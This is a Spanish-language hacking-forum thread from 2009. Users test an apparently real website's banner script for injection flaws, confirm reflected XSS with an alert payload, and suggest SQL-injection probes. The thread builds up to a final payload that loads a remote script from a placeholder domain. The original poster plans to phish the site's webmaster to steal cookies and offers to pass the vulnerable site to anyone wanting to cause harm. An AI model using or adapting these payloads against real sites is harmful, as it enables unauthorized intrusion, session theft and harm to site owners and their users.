Hola genteee..
Les comento lo que tengo...
Este link:
http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo=yyyyyyyy&ancho=zzzzzzzzzzzzzz
me devuelve:
<html>
<head>
<title>TARJETA</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body leftmargin="0" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td> <div align="left">
<img src="./eventos/imagenes/xxxxxxxx" width="zzzzzzzzzzzzzz" height="yyyyyyyy" />
</div></td>
</tr>
</table>
</body>
</html>
------------------------
Este link:
http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="&ancho=zzzzzzzzzzzzzz
Devuelve:
<img src="./eventos/imagenes/xxxxxxxx" width="zzzzzzzzzzzzzz" height="\"" />
------------------------
Este link:
http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo=>&ancho=zzzzzzzzzzzzzz
Devuelve:
<img src="./eventos/imagenes/xxxxxxxx" width="zzzzzzzzzzzzzz" height=">" />
------------------------
Este link:
http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="<!--&ancho=zzzzzzzzzzzzzz
Devuelve:
<img src="./eventos/imagenes/xxxxxxxx" width="zzzzzzzzzzzzzz" height="\"<!--" />
Segun sus sabias miradas.. hay alguna vulnerabilidad???
AGREGO:
Si quieren que les mande mas links.. con mas pruebas. diganme que pongo..
hola, mira es algo asi como un html inyection o Xss, proba con http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/><script>alert(05)</script>
si da una alerta con el num 5 es vulnerable a cross scripting, html inyection o como le quieras decir
fijate otros tipos de cadenas como php?idnoticia=33, y ahi podras inyectar,o
http://www.unsitio.com/unsitio/ver_banner2.php?archivo=1+and+1=1 te tenderia que no decir nada, y haciendo http://www.unsitio.com/unsitio/ver_banner2.php?archivo=1+and+1=0 tendria que cambiar algo.
fijate algunos tutos de por ahi
saludps
Si, el 1º dió el aviso de "5" en una alerta...
Buscaré algo de crosscripting..
Hola, sip eso es xss.
lo que puedes lograr hacer es obtener la cookie de alguien pero necesiatrías que alguien viera un link y que ese alguien esté logueado en algún sistema de administración o algo.
Busca acá:
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_10809-t244090.0.html
hay buenos tutos sobre XSS.
Si tienes duda sobre alguno nos cuentas.
claro,tambien fijate si hay sql inyection que es mas provechoso :rolleyes:
saludos
Intenta los vectores comunes, como el "power of "'"" <-agregar la comilla simple o comillas etc, ademas de ello intenta mas chars, de momento solo noto el XSS, ya nos contaras.
-berz3k.
Cita de: berz3k en 25 Agosto 2009, 12:42 PM
Intenta los vectores comunes, como el "power of "'"" <-agregar la comilla simple o comillas etc, ademas de ello intenta mas chars, de momento solo noto el XSS, ya nos contaras.
-berz3k.
La comilla comun, y la simple se traspasan a: \' o \"
Fijate que en el 1º psot puse el ejemplo de la comilla doble..
Cita de: fede_cp en 23 Agosto 2009, 18:19 PM
claro,tambien fijate si hay sql inyection que es mas provechoso :rolleyes:
saludos
Y como puedo probar ello??.. dime algun codigo...
Cita de: WHK en 23 Agosto 2009, 03:17 AM
Hola, sip eso es xss.
lo que puedes lograr hacer es obtener la cookie de alguien pero necesiatrías que alguien viera un link y que ese alguien esté logueado en algún sistema de administración o algo.
Busca acá:
http://foro.elhacker.net/nivel_web/temas_mas_destacados_fallas_y_explotaciones_a_nivel_web_actualizado_10809-t244090.0.html
hay buenos tutos sobre XSS.
Si tienes duda sobre alguno nos cuentas.
Y como podria hacer eso de las cookies??? Porque podria enviarle un e-mail de contacto al webmaster y ta vez caiga... :)
AGREGO:
El - y ; tambien entran a la perfeccion..
"dime algún codigo" :¬¬ busca que esta lleno de tutoriales, te dejo uno de los mejores que está en este foro, solo hay que buscar http://foro.elhacker.net/hacking_avanzado/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.0.html (http://foro.elhacker.net/hacking_avanzado/gran_tutorial_sobre_inyecciones_sql_en_mysql-t247535.0.html)
espero que sigas aprendiendo y buscando
saludos
Ahora bien.. tengo una gran duda..
Cuando mando:
http://www.unsitio.com/xxxxxx/ver_banner2.php?archivo=xxxxxxxxxxxx.jpg&largo="/><?php echo $archivo; ?><&ancho=zzzzzz
Me manda éste codigo fuente:
<html>
<head>
<title>TARJETA</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
</head>
<body leftmargin="0" topmargin="0">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
<tr>
<td> <div align="left">
<img src="./eventos/imagenes/xxxxxxxxxxxx.jpg" width="zzzzzz" height="\"/><?php echo $archivo; ?><" />
</div></td>
</tr>
</table>
</body>
</html>
como podria hacer para que me tome realmente eso que mandé como PHP???
Es que no hay inyección de codigo PHP si no que hay un XSS (http://es.wikipedia.org/wiki/Cross-site_scripting) que permite solo la inyección de codigo HTML ;) .
Saludos
No se puede inyectar php mas que en funciones eval ()
Buen punto... Muchas gracias..
Creo que sin poder ingresar el ' y " voy a ahcer poca cosa solo...
Mejor dejo todo tranquilo.. sin maldades..
Por las dudas, si alguien quiere hacer maldades.. que me diga por MP y le paso la web con la vulnerabilidad...
Cita de: Skeletron en 25 Agosto 2009, 20:51 PM
Buen punto... Muchas gracias..
Creo que sin poder ingresar el ' y " voy a ahcer poca cosa solo...
Mejor dejo todo tranquilo.. sin maldades..
Por las dudas, si alguien quiere hacer maldades.. que me diga por MP y le paso la web con la vulnerabilidad...
nop xD
<script src=http://tudominio/tuscript.js ></script>Saludos!
Y eso amigo??? donde lo queres meter?
Acordate que todo ésto está dentro de un campo IMG
Cita de: fede_cp en 22 Agosto 2009, 19:19 PM
hola, mira es algo asi como un html inyection o Xss, proba con http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/><script>alert(05)</script>
si da una alerta con el num 5 es vulnerable a cross scripting, html inyection o como le quieras decir
saludps
Cita de: Skeletron en 22 Agosto 2009, 22:22 PM
Si, el 1º dió el aviso de "5" en una alerta...
Buscaré algo de crosscripting..
entonces:
http://www.unsitio.com/unsitio/ver_banner2.php?archivo=xxxxxxxx&largo="/><script src=http://tudominio/tuscript.js ></script>saludos!